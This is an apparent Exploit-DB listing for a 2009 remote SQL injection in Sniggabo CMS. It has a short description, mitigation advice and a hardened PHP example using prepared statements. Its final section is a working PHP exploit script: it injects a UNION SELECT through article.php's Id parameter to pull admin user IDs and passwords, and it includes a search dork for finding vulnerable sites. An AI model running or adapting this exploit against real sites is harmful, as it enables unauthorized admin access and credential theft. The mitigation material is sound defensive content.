Vendor: Sniggabo CMS
By: Lidloses_Auge
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Sniggabo CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Sniggabo CMS – Remote SQL Injection Exploit

This exploit lets an attacker obtain access to the admin panel of a vulnerable Sniggabo CMS site. It sends a crafted HTTP request to the site's article.php page in which the Id parameter carries SQL; the site executes that SQL and returns credentials from its user table, which the attacker can then use to log into the admin panel.

Mitigation:

Ensure that all user-supplied input is validated and properly sanitized before it is used in any SQL query.
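As an added illustration of that mitigation (this is not Sniggabo CMS source, which the listing does not include): the exploit URL injects into an unquoted Id parameter, so the assumed vulnerable query shape is shown first, followed by a version that validates the value as an integer and binds it through a PDO prepared statement. Table and column names are assumptions.

```php
<?php
// Added example, not Sniggabo CMS code. The exploit's "Id=null union select ..."
// URL implies Id is interpolated unquoted into a SELECT; the table and column
// names below are assumed for illustration.

declare(strict_types=1);

// Assumed vulnerable pattern: the raw request value becomes part of the SQL text,
// so a value such as "null union select ..." is parsed as part of the statement.
function vulnerableArticleQuery(array $get): string
{
    $id = $get['Id'] ?? '';
    return "SELECT title, body FROM articles WHERE id = " . $id;
}

// Hardened step 1: enforce the expected type before the value goes anywhere near SQL.
function validatedArticleId(array $get): int
{
    $id = filter_var($get['Id'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($id === false) {
        throw new InvalidArgumentException('Id must be a positive integer');
    }
    return $id;
}

// Hardened step 2: bind the value as a parameter so the database engine never
// treats it as SQL, whatever it contains.
function fetchArticle(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT title, body FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage sketch (assumes $db is an existing PDO connection):
// $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // real server-side prepares
// try {
//     $article = fetchArticle($db, validatedArticleId($_GET));
// } catch (InvalidArgumentException $e) {
//     http_response_code(400);
// }
```

Disabling emulated prepares matters for MySQL, since with emulation enabled PDO interpolates the value client-side instead of sending it separately from the statement.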

Exploit-DB raw data:

<?php
print_r('

################################################

Sniggabo CMS - Remote SQL Injection Exploit

Date:				11.06.2009
Vulnerability discovered by:	Lidloses_Auge
Exploit coded by:		Lidloses_Auge
Homepage:		    	http://www.novusec.com
Greetz to:			-=Player=- , Suicide, enco,
				Palme, GPM, karamble, Free-Hack

Admin Panel: 			[target]/admin/login.php
Dork:				"powered by Sniggabo CMS" inurl:article.php?id
Use:				php '.$argv[0].' http://www.site.com

################################################

');
// The target base URL is taken from the first command-line argument.
$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--";
$src = file_get_contents($url);
// split() was removed in PHP 7; explode() behaves the same for a literal delimiter.
$data = explode("::", $src);
echo "Admin: $data[1]\nPassword: $data[2]\n";
?>

# milw0rm.com [2009-06-11]